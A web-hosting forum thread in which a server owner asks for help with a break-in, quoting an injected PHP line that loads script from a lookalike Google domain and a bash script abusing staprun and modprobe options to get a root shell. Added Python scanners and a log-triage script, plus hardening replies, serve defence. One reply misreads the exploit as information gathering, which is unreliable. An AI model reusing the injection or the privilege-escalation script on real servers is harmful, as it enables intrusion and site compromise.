Malware Infection

ii silver ii

ǝɹıɟpǝʞɔı&
Dec 18, 2008
Didn't ever expect to post this but I guess someone/thing found an exploit to gain access to my server ...

Basically they uploaded a few files to the public_html and ran some bash commands to move those files to the /home/ directory of the users:



A couple of php files also had lines such as:

PHP:
#9c282e#

if(!$srvc_counter) {
    echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>";
$srvc_counter = true;}

#/9c282e#

Those files can be easily cleaned, but there were four .session_121432 type files uploaded that contain either bash scripts or machine code. My question is: can anyone decode these two attached files?

The one of those files that's not in machine language is:

Bash:
#!/bin/sh
export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin;
export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8
export TERM=linux
echo -n "-> checking staprun: ";
if which staprun 2>&1 | grep -q "no $1";
then
  flag=1
elif [ -z "`which $1 2>&1`" ];
then
  flag=1;
fi
if [ "$flag" = "1" ];
then
  echo "no staprun, exiting"; exit;
else
  echo "found";
  echo "-> trying to exploit... ";
  printf "install uprobes /bin/sh" > ololo.conf;
  MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo
  rm -f ololo.conf
fi

Would be nice to see what they ran!

The server's getting nuked and rebuilt later today so this will all be gone soon.

Also any ideas on how they gained access to two users' public_html folders? Neither account had anything like WordPress or vBulletin, mostly custom-coded code; possibly a brute force?
 

Attachments: ZippedSessionFiles.zip (9.1 KB)
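A scanner for the kind of injection described in the post above, added here as an example (not code from the thread). It looks for the "#9c282e#" ... "#/9c282e#" marker pair the poster found, reports the remote script each block loads, and strips the block; matching any six-hex-digit marker id, rather than only 9c282e, is an assumption of this example.

```python
import re
from pathlib import Path

# The injected block in the post is delimited by "#<id>#" ... "#/<id>#" markers
# (id 9c282e there); matching any 6-hex-digit id is an assumption of this example.
INJECT_RE = re.compile(r"#(?P<id>[0-9a-f]{6})#\s*(?P<body>.*?)#/(?P=id)#\s*", re.DOTALL)
# Pulls the remote script URL out of the injected <script src=...> tag
# (the quotes are backslash-escaped inside the PHP echo string).
SCRIPT_SRC_RE = re.compile(r"src=\\?[\"']([^\"'\\]+)\\?[\"']")

def find_injections(source):
    """Return (marker id, remote script URL or None) for each injected block."""
    hits = []
    for m in INJECT_RE.finditer(source):
        src = SCRIPT_SRC_RE.search(m.group("body"))
        hits.append((m.group("id"), src.group(1) if src else None))
    return hits

def strip_injections(source):
    """Return the source with every marker-delimited block removed."""
    return INJECT_RE.sub("", source)

def scan_tree(root):
    """Walk root for .php files; map each infected path to its find_injections() hits."""
    infected = {}
    for path in Path(root).rglob("*.php"):
        hits = find_injections(path.read_text(errors="replace"))
        if hits:
            infected[str(path)] = hits
    return infected

# Constructed sample file reproducing the block quoted in the post.
SAMPLE = '''<?php
#9c282e#

if(!$srvc_counter) {
    echo "<script type=\\"text/javascript\\" src=\\"http://g00glestatic.com/s.js\\"></script>";
$srvc_counter = true;}

#/9c282e#
echo "legit page";
'''

if __name__ == "__main__":
    for marker, url in find_injections(SAMPLE):
        print(f"injected block {marker} loads {url}")
    print(strip_injections(SAMPLE), end="")
```

Run scan_tree() against a copy of public_html before cleaning so the list of infected files and the domains they pull from is preserved for the post-mortem.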


Do you use FileZilla for FTP? If so, it's easy for somebody to grab the plain text file that holds all your servers with usernames and passwords.
 
I would check your computer for malware first. Use Combofix

You can use FZ portable or switch to something more secure, like CuteFTP

Also, if you have a Dedicated, reseller or virtual server hosting account, see if you can get ClamAV Scanner installed. It will scan your sites for potential malware.
 
I use FileZilla with secure FTP, didn't realise that file was plain text ... is there no setting to encrypt it? Any decent alternatives with this feature?

Have Trend Micro Titanium running in the background and it's not noticed any trojans etc.

The only stupid mistake was not having hosts.allow setup with a static ip, that will be resolved on the rebuild though.

I run a dedicated so I'll check that software out, thanks!
 
Yeah, FileZilla stores it in an XML file. If you still want to use it I'd suggest doing what Brandon said or just move to another FTP client. Your other options are to not store the servers and usernames/passwords in FileZilla and use something like KeePass.

You can also add in an extra layer of security and run FZ portable on a virtual encrypted disk using TrueCrypt. Mount when you need to use and dismount when done. Pain in the ass but it could save a future headache.
 
Would be nice to see what they ran!

The server's getting nuked and rebuilt later today so this will all be gone soon.

Also any ideas on how they gained access to two users' public_html folders? Neither account had anything like WordPress or vBulletin, mostly custom-coded code; possibly a brute force?


If your server doesn't have systemtap installed, that shell script won't do anything but exit. They are gathering information about your system and its environment, and then attempting to cover their tracks. stap will probe devices and display things like current connections, etc.

They used sudo to run privileged commands, so you definitely need to not use that same password. Check your /var/log/auth.log and it should show which user the script was running under when it issued the sudo command.

Also, do you know if those user accts were legit users?
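The auth.log check suggested above, written out as a small triage script. This is an added example, not code from the thread; the sudo and sshd line shapes are the standard syslog records, and the sample log lines are constructed for illustration rather than taken from the poster's server. It flags sudo invocations whose command matches indicators from the thread (staprun, ololo, .session_) and, for the brute-force question, counts failed SSH password logins per source address.

```python
import re
from collections import Counter

# Line shapes assumed here are the standard syslog records written by sudo and sshd:
#   Dec 18 03:12:30 host sudo:   user : TTY=pts/0 ; PWD=/home/user ; USER=root ; COMMAND=/usr/bin/staprun -u ololo
#   Dec 18 03:10:51 host sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 4022 ssh2
SUDO_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sudo:\s+(?P<user>\S+) : (?P<fields>.*)$")
SSH_FAIL_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")

def parse_sudo(line):
    """Return {ts, user, target, pwd, command} for a sudo record, else None."""
    m = SUDO_RE.match(line)
    if not m:
        return None
    # "KEY=value" fields are separated by " ; "; split on the first "=" only, as COMMAND may contain "=".
    fields = dict(part.partition("=")[::2] for part in m.group("fields").split(" ; "))
    return {"ts": m.group("ts"), "user": m.group("user"), "target": fields.get("USER"),
            "pwd": fields.get("PWD"), "command": fields.get("COMMAND")}

def sudo_events(lines, indicators=("staprun", "ololo", ".session_")):
    """Every sudo invocation, flagged when the command matches an indicator from the thread."""
    events = []
    for line in lines:
        rec = parse_sudo(line)
        if rec is not None:
            rec["flagged"] = any(i in (rec["command"] or "") for i in indicators)
            events.append(rec)
    return events

def ssh_failures_by_ip(lines, threshold=5):
    """Count failed SSH password logins per source IP; keep sources at or above threshold."""
    counts = Counter(m.group("ip") for m in map(SSH_FAIL_RE.search, lines) if m)
    return {ip: n for ip, n in counts.items() if n >= threshold}
# Constructed sample log (not from the poster's server): a guessing burst, a success, then the staprun sudo.
SAMPLE_LOG = [
    "Dec 18 03:10:51 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 4022 ssh2",
    "Dec 18 03:10:53 web1 sshd[2203]: Failed password for invalid user test from 203.0.113.5 port 4023 ssh2",
    "Dec 18 03:10:55 web1 sshd[2205]: Failed password for root from 203.0.113.5 port 4024 ssh2",
    "Dec 18 03:10:57 web1 sshd[2207]: Failed password for root from 203.0.113.5 port 4025 ssh2",
    "Dec 18 03:10:59 web1 sshd[2209]: Failed password for siteuser from 203.0.113.5 port 4026 ssh2",
    "Dec 18 03:11:04 web1 sshd[2211]: Accepted password for siteuser from 203.0.113.5 port 4027 ssh2",
    "Dec 18 03:12:30 web1 sudo:   siteuser : TTY=pts/0 ; PWD=/home/siteuser ; USER=root ; COMMAND=/usr/bin/staprun -u ololo",
    "Dec 18 09:00:00 web1 sudo:    admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt-get update",
]

if __name__ == "__main__":
    for ev in sudo_events(SAMPLE_LOG):
        print(("FLAGGED " if ev["flagged"] else "        ") + f'{ev["ts"]} {ev["user"]} as {ev["target"]}: {ev["command"]}')
    print("password-guessing sources:", ssh_failures_by_ip(SAMPLE_LOG))
```

On a real box feed it the lines of /var/log/auth.log (and any rotated copies) rather than SAMPLE_LOG; a flagged sudo record names the account whose password must be treated as burned.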
 
Is there a way to make FZ secure?

thanks

You can encrypt all your filezilla network traffic by switching from ftp to sftp. Unencrypted traffic can easily have logins and passwords sniffed. And yes, ftp is unencrypted. sftp is what you want.

I use FileZilla with secure FTP, didn't realise that file was plain text ...

The user login/password database file itself resides on your desktop. In plaintext. However when filezilla uses that file to automatically log in to that site it does NOT transmit the user and pass unencrypted as long as you're using sftp. Everything about an sftp session is encrypted. Now if you were using plain old ftp then yeah, sniffable. But someone would need access to your workstation to steal those passwords. They cannot grab them otherwise.
 
But someone would need access to your workstation to steal those passwords. They cannot grab them otherwise.

This is exactly what they are talking about though. You get a virus on your machine and one of the key targets is your Filezilla logins and passwords file. It's happened to several WF members. It happened to me when I was using AVG simply by visiting an infected WordPress site, and 8 of my sites became infected. I've since switched to Kaspersky.

I also use KeePass now to store my logins and passwords, and with it you can launch FileZilla by using this link, where the URL goes in the entry, and it will not store anything...

cmd://"C:\Program Files (x86)\FileZilla FTP Client\filezilla.exe" ftp://{USERNAME}:{PASSWORD}@{TITLE}
 
Plenty of flaws in PHP itself if that's what you're using to inject code/scripts. I had to fix a WordPress site a few months ago by updating .htaccess to protect against PHP issues.
 
lol - what kinda idiot leaves this on the infected machine

Bash:
  echo "found";
  echo "-> trying to exploit... ";

anyhow - it's good that you are looking into this, but don't forget a compromise like this could have happened from a number of different angles, including from the top layer down (WP/MySQL injection) etc.

or, like some folks in here mentioned, it could have been something from YOUR local side that infected your FTP client's saved XML file.

really kinda scary to me - I didn't realize that a lot of these malware programs were targeting that specific file. scary!
 
Do not use ftp - do not use password - do not allow passwords.

Use only ssh keys and SCP/SFTP to login.

The first thing I do after I install a server (Linux) is to set up SSH and the keys,
and then I turn off password-based login.

Then fail2ban and you are a lot more secure.

The trick here is that the majority of PHP hacks give you only very limited access to the server system itself.
They need to enter your server directly at some point; that is why they
create users and get passwords. Only very broken PHP installations with
tons of security holes allow a full-access hack through PHP and the web server only.

It is a bit more complex, but as said: with SSH key access only, they can't get on your server even if they get passwords.

Give your PHP install a basic check: PHP Security Consortium: PHPSecInfo

After that, you will be somewhat secured from the script-kiddie hacker.
Real hackers using zero-day bugs in Windows or Linux or in the web
installation are a different thing, but you will not see those guys. They work
for the CIA or KGB or they hack some big banks. They have better things to do than your server.